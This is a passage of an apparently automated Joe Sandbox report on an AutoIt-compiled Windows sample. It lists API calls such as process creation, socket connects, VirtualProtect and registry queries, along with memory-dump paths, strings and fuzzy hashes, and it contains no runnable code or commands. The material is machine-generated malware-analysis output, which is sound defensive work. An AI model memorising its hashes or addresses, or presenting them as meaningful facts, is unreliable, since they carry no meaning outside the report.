                                                                                                                                                          • _memset.LIBCMT ref: 001823E6
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00182579
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0018259D
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001825DD
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001825FF
                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00182760
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00182792
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001827C1
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00182838
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4090791747-0
                                                                                                                                                          • Opcode ID: c9bb968c3ea1663556e101458a64b04f87d6797cf0dc76bb289ec61ff93f310f
                                                                                                                                                          • Instruction ID: 86d6ac5b3f3dd7f89edca65f5c75bd7048be1a7a93e35d443d78550abf72185e
                                                                                                                                                          • Opcode Fuzzy Hash: c9bb968c3ea1663556e101458a64b04f87d6797cf0dc76bb289ec61ff93f310f
                                                                                                                                                          • Instruction Fuzzy Hash: D0D1AF31604301DFCB16EF24D891B6ABBE1AF99310F14846DF9999B2A2DB31ED41CF52

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                          • Opcode ID: 07fc5eb340252ad42a7066b1e0062ea3ede4d5601a83d0f8ddcaf29f25927198
                                                                                                                                                          • Instruction ID: fe81dc5034f49194d57bc2c15c32441e623c56c75d14bbf482183a992510b28b
                                                                                                                                                          • Opcode Fuzzy Hash: 07fc5eb340252ad42a7066b1e0062ea3ede4d5601a83d0f8ddcaf29f25927198
                                                                                                                                                          • Instruction Fuzzy Hash: 35E19F71A00219AFDF24DFA8D881AAE77B9FF58354F14802DF949AB281E7709D41CB91

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearInit$_memset
                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00122ECB
                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00122EEC
                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00122F00
                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00122F09
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0013EADA,?,?), ref: 0013EB27
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0013EADA,?,?), ref: 00194B26
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0013EADA,?,?), ref: 00194B65
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue$Open
                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 002CC27A
                                                                                                                                                          • 6CA06DE0.KERNEL32(?,002C5FF9), ref: 002CC298
                                                                                                                                                          • ExitProcess.KERNEL32(?,002C5FF9), ref: 002CC2A9
                                                                                                                                                          • VirtualProtect.KERNEL32(00120000,00001000,00000004,?,00000000), ref: 002CC2F7
                                                                                                                                                          • VirtualProtect.KERNEL32(00120000,00001000), ref: 002CC30C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProtectVirtual$ExitLibraryLoadProcess
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00123B1E: _wcsncpy.LIBCMT ref: 00123B32
                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00166DBA
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00166DC5
                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00166DD9
                                                                                                                                                          • _wcsrchr.LIBCMT ref: 00166DFB
                                                                                                                                                            • Part of subcall function 00166D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00166E31
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0017ACD3: inet_addr.WS2_32(00000000), ref: 0017ACF5
                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00179160
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 0017916F
                                                                                                                                                          • connect.WS2_32(00000000,?,00000010), ref: 0017918B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3701255441-0
                                                                                                                                                          • Opcode ID: 1a491c7ebe3a9a254247de239cf660244e1c2e095cfcae92fee52ae9d6baecf4
                                                                                                                                                          • Instruction ID: 0b55f2b355e2bfa6cd6d9fe6d356f1f354bc0668ef5edd2445ba8dcf2b452576
                                                                                                                                                          • Opcode Fuzzy Hash: 1a491c7ebe3a9a254247de239cf660244e1c2e095cfcae92fee52ae9d6baecf4
                                                                                                                                                          • Instruction Fuzzy Hash: 9921D2323006109FCB04AF68DC89F6E77A9EF59324F048019F90AAB3D2CB70EC458B51
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00123F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001234E2,?,00000001), ref: 00123FCD
                                                                                                                                                          • _free.LIBCMT ref: 00193C27
                                                                                                                                                          • _free.LIBCMT ref: 00193C6E
                                                                                                                                                            • Part of subcall function 0012BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,001E22E8,?,00000000,?,00123E2E,?,00000000,?,001BDBF0,00000000,?), ref: 0012BE8B
                                                                                                                                                            • Part of subcall function 0012BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00123E2E,?,00000000,?,001BDBF0,00000000,?,00000002), ref: 0012BEA7
                                                                                                                                                            • Part of subcall function 0012BDF0: __wsplitpath.LIBCMT ref: 0012BF19
                                                                                                                                                            • Part of subcall function 0012BDF0: _wcscpy.LIBCMT ref: 0012BF31
                                                                                                                                                            • Part of subcall function 0012BDF0: _wcscat.LIBCMT ref: 0012BF46
                                                                                                                                                            • Part of subcall function 0012BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0012BF56
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                          • API String ID: 1510338132-1757145024
                                                                                                                                                          • Opcode ID: 1244e8f1861f8caf56403ea425b68d1195a23ba46bac6ef8cc627800b9aea3e4
                                                                                                                                                          • Instruction ID: 097261276631a240f289ef3092f7ec926fcaff5b5d8e3b3690d98b1de5c09fdf
                                                                                                                                                          • Opcode Fuzzy Hash: 1244e8f1861f8caf56403ea425b68d1195a23ba46bac6ef8cc627800b9aea3e4
                                                                                                                                                          • Instruction Fuzzy Hash: 53917371910229AFCF04EFA4DC919EEB7B4BF19310F544469F826EB291EB34AE15CB50
                                                                                                                                                          APIs
                                                                                                                                                          • __getstream.LIBCMT ref: 0014418E
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 001441C9
                                                                                                                                                          • __wopenfile.LIBCMT ref: 001441D9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                          • String ID: <G
                                                                                                                                                          • API String ID: 1820251861-2138716496
                                                                                                                                                          • Opcode ID: 9d2fc281b1aa0b66c4fc2c8da82b97af7f57f7e712c99117b488e96148842862
                                                                                                                                                          • Instruction ID: 52f95ef9281f79661ac947bb55bd8e39a818e582251821ed5292d869a8bba875
                                                                                                                                                          • Opcode Fuzzy Hash: 9d2fc281b1aa0b66c4fc2c8da82b97af7f57f7e712c99117b488e96148842862
                                                                                                                                                          • Instruction Fuzzy Hash: BF11C270D00206ABDB10BFB48C427AF3AE4AF74750F558929A415DB2A1EB74D98297A1
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0013C948,SwapMouseButtons,00000004,?), ref: 0013C979
                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0013C948,SwapMouseButtons,00000004,?,?,?,?,0013BF22), ref: 0013C99A
                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,0013C948,SwapMouseButtons,00000004,?,?,?,?,0013BF22), ref: 0013C9BC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                          • Opcode ID: cf935f22fe667565d352d3b105db74632c090046b58794f37e10e0ee613b54e7
                                                                                                                                                          • Instruction ID: 140dc21c18c8d4529854c9f854feabd935cce251477e0f2632d02874500531b6
                                                                                                                                                          • Opcode Fuzzy Hash: cf935f22fe667565d352d3b105db74632c090046b58794f37e10e0ee613b54e7
                                                                                                                                                          • Instruction Fuzzy Hash: 57113976611608BFDB118FA4DC44EEF7BBCEF05748F11846AB946E7210E731AE509BA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b742692033528a92446f71d73ca532d21d8898c0d8fa457b66e80582b8f9e5d8
                                                                                                                                                          • Instruction ID: 749e6bfbbf5aa2685beb46c515faf01e16e02ad4ae72331a1778a251ba4d2180
                                                                                                                                                          • Opcode Fuzzy Hash: b742692033528a92446f71d73ca532d21d8898c0d8fa457b66e80582b8f9e5d8
                                                                                                                                                          • Instruction Fuzzy Hash: EDC19075A4021AEFCB14CF94C884EAEB7B5FF48305F504698E922AF251D730EE45CBA1
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001241A7: _fseek.LIBCMT ref: 001241BF
                                                                                                                                                            • Part of subcall function 0016CE59: _wcscmp.LIBCMT ref: 0016CF49
                                                                                                                                                            • Part of subcall function 0016CE59: _wcscmp.LIBCMT ref: 0016CF5C
                                                                                                                                                          • _free.LIBCMT ref: 0016CDC9
                                                                                                                                                          • _free.LIBCMT ref: 0016CDD0
                                                                                                                                                          • _free.LIBCMT ref: 0016CE3B
                                                                                                                                                            • Part of subcall function 001428CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00148715,00000000,001488A3,00144673,?), ref: 001428DE
                                                                                                                                                            • Part of subcall function 001428CA: GetLastError.KERNEL32(00000000,?,00148715,00000000,001488A3,00144673,?), ref: 001428F0
                                                                                                                                                          • _free.LIBCMT ref: 0016CE43
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1552873950-0
                                                                                                                                                          • Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                                                                                                                                          • Instruction ID: 0e99a41b440544d2ac1e7be011974d3c0e8314e1bcb752d478c945459dc903ef
                                                                                                                                                          • Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                                                                                                                                          • Instruction Fuzzy Hash: 90514CB1904218AFDF14DF64DC81AAEBBB9EF58300F1040AEF659A3291D7715A90CF69
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00121E87
                                                                                                                                                            • Part of subcall function 001238E4: _memset.LIBCMT ref: 00123965
                                                                                                                                                            • Part of subcall function 001238E4: _wcscpy.LIBCMT ref: 001239B5
                                                                                                                                                            • Part of subcall function 001238E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001239C6
                                                                                                                                                          • KillTimer.USER32(?,00000001), ref: 00121EDC
                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00121EEB
                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00194526
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1378193009-0
                                                                                                                                                          • Opcode ID: 32db6f352d97de8fb2f26dbb35dcb49cd3092a2e7b342977eccb5e59da901902
                                                                                                                                                          • Instruction ID: 6246c1e97da9255902bffd3ede6be4c4a4bdfa09a5e7d065c836a72873d735cf
                                                                                                                                                          • Opcode Fuzzy Hash: 32db6f352d97de8fb2f26dbb35dcb49cd3092a2e7b342977eccb5e59da901902
                                                                                                                                                          • Instruction Fuzzy Hash: 362104B1904794AFEB33CB649C55FEBBBECAB16308F05008DE69E56141C3746A85CB11
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0016AEA5,?,?,00000000,00000008), ref: 0013F282
                                                                                                                                                            • Part of subcall function 0013F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0016AEA5,?,?,00000000,00000008), ref: 0013F2A6
                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 001792F0
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 001792FB
                                                                                                                                                          • _memmove.LIBCMT ref: 00179328
                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 00179333
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1504782959-0
                                                                                                                                                          • Opcode ID: 889b94bbd8397d7970cbd5acca07280e42732a7cc70306e4e60d54007b9e5710
                                                                                                                                                          • Instruction ID: 00a4b8ae540ca24fc39b2937b2f5f82ef90c0b80bfa5935ae01fbfee5d36db1a
                                                                                                                                                          • Opcode Fuzzy Hash: 889b94bbd8397d7970cbd5acca07280e42732a7cc70306e4e60d54007b9e5710
                                                                                                                                                          • Instruction Fuzzy Hash: A9116075900509AFCB04FBA0DD56CEE77B9EF28314B108065F506A72A2EB30EE14DB51
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001445EC: __FF_MSGBANNER.LIBCMT ref: 00144603
                                                                                                                                                            • Part of subcall function 001445EC: __NMSG_WRITE.LIBCMT ref: 0014460A
                                                                                                                                                            • Part of subcall function 001445EC: RtlAllocateHeap.NTDLL(01710000,00000000,00000001), ref: 0014462F
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                            • Part of subcall function 00147495: RaiseException.KERNEL32(?,?,0012125D,001D6598,?,?,?,00140158,0012125D,001D6598,?,00000001), ref: 001474E6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                          • String ID: bad allocation
                                                                                                                                                          • API String ID: 3902256705-2104205924
                                                                                                                                                          • Opcode ID: e3daa7e3aba354bcc83d1522723f55afedb2659312e4d932a829c68eaccc608e
                                                                                                                                                          • Instruction ID: d3f29eb865311e2157c832d0fea5d0fd40c5f58e1b3d850ddc4e8c79f054e18c
                                                                                                                                                          • Opcode Fuzzy Hash: e3daa7e3aba354bcc83d1522723f55afedb2659312e4d932a829c68eaccc608e
                                                                                                                                                          • Instruction Fuzzy Hash: BCF0C87910420D66CB16AFE9ED029DE7BECAF19750F100416FA05E71E1DBB0D68096A5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 23948a5e6c2919f49f91be8b805407a7440c6f61a60d617d4b53648e0cec9964
                                                                                                                                                          • Instruction ID: a181e73baefaec963c5c64944209b7560baa81a556231e270080d302c8823d54
                                                                                                                                                          • Opcode Fuzzy Hash: 23948a5e6c2919f49f91be8b805407a7440c6f61a60d617d4b53648e0cec9964
                                                                                                                                                          • Instruction Fuzzy Hash: 60F158716087019FC714DF28C980B5BB7F5BF98314F10892EF9999B292D731E946CB82
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0012C00E,?,?,?,?,00000010), ref: 0012C627
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0012C65F
                                                                                                                                                          • _memmove.LIBCMT ref: 0012C697
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3033907384-0
                                                                                                                                                          • Opcode ID: 6ab730b1c4b06e537b1710d75188948b9e9dd7ded68be0c6c924aa7c37848e2b
                                                                                                                                                          • Instruction ID: 40a4dee7e2a3b5b638f9f386228f53b44d68b309d5a6a0c8823dfc73c83eb453
                                                                                                                                                          • Opcode Fuzzy Hash: 6ab730b1c4b06e537b1710d75188948b9e9dd7ded68be0c6c924aa7c37848e2b
                                                                                                                                                          • Instruction Fuzzy Hash: 69311CB16002016BDB249F74EC46B1BB7D9EF54310F10453EF65AC7690EB31E950C791
                                                                                                                                                          APIs
                                                                                                                                                          • SHGetMalloc.SHELL32(00123C31), ref: 00123A7D
                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00123AD2
                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00123A8F
                                                                                                                                                            • Part of subcall function 00123B1E: _wcsncpy.LIBCMT ref: 00123B32
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3981382179-0
                                                                                                                                                          • Opcode ID: 5edf268a70dfdd0cfdb1eaebbec478313e9d741458d3eac3d4d706aa102e32e5
                                                                                                                                                          • Instruction ID: 74f5d80564045de84dfa5146334ed7c3fb5df69ae06f6c66619a3edfc96198ac
                                                                                                                                                          • Opcode Fuzzy Hash: 5edf268a70dfdd0cfdb1eaebbec478313e9d741458d3eac3d4d706aa102e32e5
                                                                                                                                                          • Instruction Fuzzy Hash: E2218176B00128ABCB14DF95EC88DEEB7BDEF89700B1040A8F50AD7251DB749E46CB94
                                                                                                                                                          APIs
                                                                                                                                                          • __FF_MSGBANNER.LIBCMT ref: 00144603
                                                                                                                                                            • Part of subcall function 00148E52: __NMSG_WRITE.LIBCMT ref: 00148E79
                                                                                                                                                            • Part of subcall function 00148E52: __NMSG_WRITE.LIBCMT ref: 00148E83
                                                                                                                                                          • __NMSG_WRITE.LIBCMT ref: 0014460A
                                                                                                                                                            • Part of subcall function 00148EB2: GetModuleFileNameW.KERNEL32(00000000,001E0312,00000104,?,00000001,00140127), ref: 00148F44
                                                                                                                                                            • Part of subcall function 00148EB2: ___crtMessageBoxW.LIBCMT ref: 00148FF2
                                                                                                                                                            • Part of subcall function 00141D65: ___crtCorExitProcess.LIBCMT ref: 00141D6B
                                                                                                                                                            • Part of subcall function 00141D65: ExitProcess.KERNEL32 ref: 00141D74
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • RtlAllocateHeap.NTDLL(01710000,00000000,00000001), ref: 0014462F
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1372826849-0
                                                                                                                                                          • Opcode ID: 292adddd23044b5bbd24c47f8642acb7fcabe226dfcfb5bf3959923ef247075c
                                                                                                                                                          • Instruction ID: 099edf4d819ef608a3047ebd1c0b97e97e3efee477e9c89d00eecddd04e9e89b
                                                                                                                                                          • Opcode Fuzzy Hash: 292adddd23044b5bbd24c47f8642acb7fcabe226dfcfb5bf3959923ef247075c
                                                                                                                                                          • Instruction Fuzzy Hash: 6001B531601201ABE6257B64AC42B6E3348EF92765F520525F5099B5F2DFB09CC08664
                                                                                                                                                          APIs
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0012E646
                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0012E651
                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E664
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4217535847-0
                                                                                                                                                          • Opcode ID: e204410f0addb6948118a24e77b316109f5fecb17c9085da62fb00b8e3944ce0
                                                                                                                                                          • Instruction ID: a6baa46a7e5dcb2cbb9b1cd0ffc3507388efb1b87d7ae4297902c16ae6165c31
                                                                                                                                                          • Opcode Fuzzy Hash: e204410f0addb6948118a24e77b316109f5fecb17c9085da62fb00b8e3944ce0
                                                                                                                                                          • Instruction Fuzzy Hash: 6CF01C72604355ABDB60DAE1AD45FABB7DDBB94740F080C2DF646D2180EBB0D4048722
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: CALL
                                                                                                                                                          • API String ID: 0-4196123274
                                                                                                                                                          • Opcode ID: 1f865346f372ab9c22f452d7947c11c69ce67635c163f23cecca9baf72b59274
                                                                                                                                                          • Instruction ID: f125ba821876b959a0dd8b2ee9868e614277866b85dab7bd7d9d10eaffb87a9c
                                                                                                                                                          • Opcode Fuzzy Hash: 1f865346f372ab9c22f452d7947c11c69ce67635c163f23cecca9baf72b59274
                                                                                                                                                          • Instruction Fuzzy Hash: BC227C70508341DFDB29DF24D4A0A6AB7E1FF98304F15896DE99A8B261D731EC85CF82
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001216F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00121751
                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0012159B
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00121612
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001958F7
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 458326420-0
                                                                                                                                                          • Opcode ID: 2b10d16fffd2aa0e94b844d068992f1a80967c8b66b5842bf7cf8be4c04a7794
                                                                                                                                                          • Instruction ID: 4ed87cdf37c36ad295873f99516e35140586fd9ddf93ce6f01ce50d7850c2f17
                                                                                                                                                          • Opcode Fuzzy Hash: 2b10d16fffd2aa0e94b844d068992f1a80967c8b66b5842bf7cf8be4c04a7794
                                                                                                                                                          • Instruction Fuzzy Hash: 877198B49412C5BAC315DFEAB9D089CBBA5FB69744394412EE00A9BBA2DB7044C4CF11
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID: EA06
                                                                                                                                                          • API String ID: 4104443479-3962188686
                                                                                                                                                          • Opcode ID: ff6db47ae7eaafffd899e89877be452f81c786f813307d193404c1c33bf8f013
                                                                                                                                                          • Instruction ID: 259f893b62da0e893d196edded81d3e880abd0791a1c2b8860be888916d01ecb
                                                                                                                                                          • Opcode Fuzzy Hash: ff6db47ae7eaafffd899e89877be452f81c786f813307d193404c1c33bf8f013
                                                                                                                                                          • Instruction Fuzzy Hash: 1241AF21A042349BCF158B54EC917FF7FA28F65300F294565FA82EB182C7219DF087A5
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
